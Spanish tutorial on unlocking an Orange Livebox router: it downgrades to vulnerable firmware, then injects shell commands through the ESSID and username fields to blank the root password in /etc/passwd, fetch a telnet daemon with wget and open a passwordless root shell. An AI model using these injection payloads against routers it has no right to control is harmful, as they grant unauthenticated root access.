Liberar Livebox

Liberar Livebox

Javier Sanz

1. EL LIVEBOX

Como ya sabreis, Orange distribuye el router Livebox bloqueado para que no se pueda usar con otros proveedores de internet. El bloqueo es a 2 niveles.

Livebox 2

1. Solo acepta conexiones PPPoE o PPPoA (las que ofrece Orange)

2. Solo permite nombres de usuario del tipo xxx@orangeadsl, xxx@wanadooadsl y similares. Por tanto, no podremos configurarlo para usarlo con otro ISP.

Al desbloquearlo conseguimos 2 cosas:

1. Que nos permitirá seleccionar cualquier tipo de conexión: PPPoA, PPPoE, DHCP + NAT, RFC1483, bridge,

2. Un aumento del rendimiento global en las velocidades de subida y bajada.

2. QUE NECESITAREMOS

Para desbloquear el router vamos a necesitar los siguientes elementos:

1. Estar familiarizado en el manejo del router, asignación de ips privadas, etc

2. Un pc

3. Un cable USB

4. El cd de configuración del Livebox. Si no lo tienes, puedes bajarlo desde aquí

5. Un servidor ftp que debemos instalar en nuestro pc. En nuestro caso, usamos el Serv-U, que es un servidor ftp muy sencillo de instalar y configurar.

6. Un servidor de telnet, utelnetd.

7. Una utilidad para convertir el código que nos devuelve el router

3. ¿EN QUE SE BASA EL DESBLOQUEO?

El desbloqueo se basa en una vulnerabilidad de los firmwares antiguos que nos permite entrar comandos desde la configuración del ESSID. Lo que haremos es instalar en el router un servidor de telnet que nos permitirá ejecutar comandos en el router y que nos proporcione el código de desbloqueo del router. Una vez desbloqueado, tendremos acceso a todas las opciones del router sin ningún tipo de limitación impuesta por Orange.

4. EL DOWNGRADE

La vulnerabilidad de la inyección de comandos desde la ventana ESSID se corrigió en los últimos firmwares. Por tanto, lo primero que debemos hacer es hacer un downgrade del firmware del router, es decir, pasar a una versión anterior que tenga la vulnerabilidad. Para ello vamos a bajarnos el firmware adecuado desde aquí y lo guardamos en nuestro PC.

Antes de desactualizar el firmware vamos a asignar una ip fija a nuestro pc. En nuestro caso será 10.0.0.2 y la del router será 10.0.0.1 (también puedes usar 192.168.1.1 y 192.168.1.2).

Conectamos el Livebox y el PC usando el cable USB. Instalamos el software de configuración que viene en el CD. Una vez finalizado, vemos que tenemos una utilidad que se llama “configuración de fábrica USB”.

Una vez pulsado, nos aparece una ventana donde hemos de seleccionar el firmware que vamos a instalar en el router.

A partir de aquí el proceso se completa como una actualización normal de firmware.

Una vez completado el proceso, tendremos el firmware vulnerable listo.

5. EL SERVIDOR DE TELNET

El Utelnetd lo renombraremos por comodidad a “u”. Lo podemos descargar desde su página o bien lo puedes descargar ya renombrado a “u” desde aquí.

Guardamos el fichero en un directorio.

6. EL SERVIDOR FTP

Ahora vamos a instalar el Serv-U en nuestro PC. La instalación no tiene ningún misterio y solo debemos estar atentos en que debemos permitir el acceso anónimo y poner como raíz del ftp el directorio donde hemos guardado el fichero “u”.

7. INYECCIÓN DE COMANDOS

Para inyectar los comandos y evitar errores os recomiendo que hagais un “copiar y pegar” de los comandos. Entramos en el router (admin/admin) y vamos a la pantalla de usuario conexión y en el nombre de usuario ponemos

;echo root::0:0:root:/root:/bin/sh >/etc/passwd

Con ello le quitamos la contraseña de root al router. Luego en Configuración->Avanzada->Inalámbrico, cambia el ESSID a:

;cd /etc;wget ftp://10.0.0.2/u

Pulsamos en “Enviar” y luego en “Aplicar”. Pasado unos instantes, el router se reinicia solo. Con ello lo que hacemos es decirle al router que se conecte por ftp a nuestro PC y se descargue el fichero “u”. Si tu PC usa otra ip solo tienes que sustituir 10.0.0.2 por la ip privada de tu PC. Ahora, volvemos a cambiar el ESSID y ponemos

;chmod 777 /etc/u

Con esta acción damos permisos de ejecución al fichero “u”. Por último, volvemos a cambiar el ESSID a

;/etc/u -p 23 -l /bin/sh -d

Una vez más pulsamos en “Enviar” y luego en “Aplicar”. El router se volverá a reiniciar.

8. CONECTAR POR TELNET

Si hemos realizado todos los pasos de manera correcta, podremos conectar via telnet con nuestro router. Abrimos una ventana de comandos y tecleamos “telnet 10.0.0.1? y nos aparecerá el Busybox.

Ahora debemos ejecutar lo siguiente en el telnet

redboot_fconfig_get –parameter h235_key /dev/mtd4

Nos devolverá una clave hexadecimal. La copiamos y la introducimos en esta página web

Nos devolverá la clave ya convertida lista para desbloquear el router. Por último, solo queda acceder por http al router e ir a la página pegar el código de desbloqueo proporcionado por la página y ya tendremos el router liberado para cualquier operador y con un firmware sin restricciones. Una vez reiniciado el router, vemos como lo podremos configurar para cualquier ISP.

2 Comentarios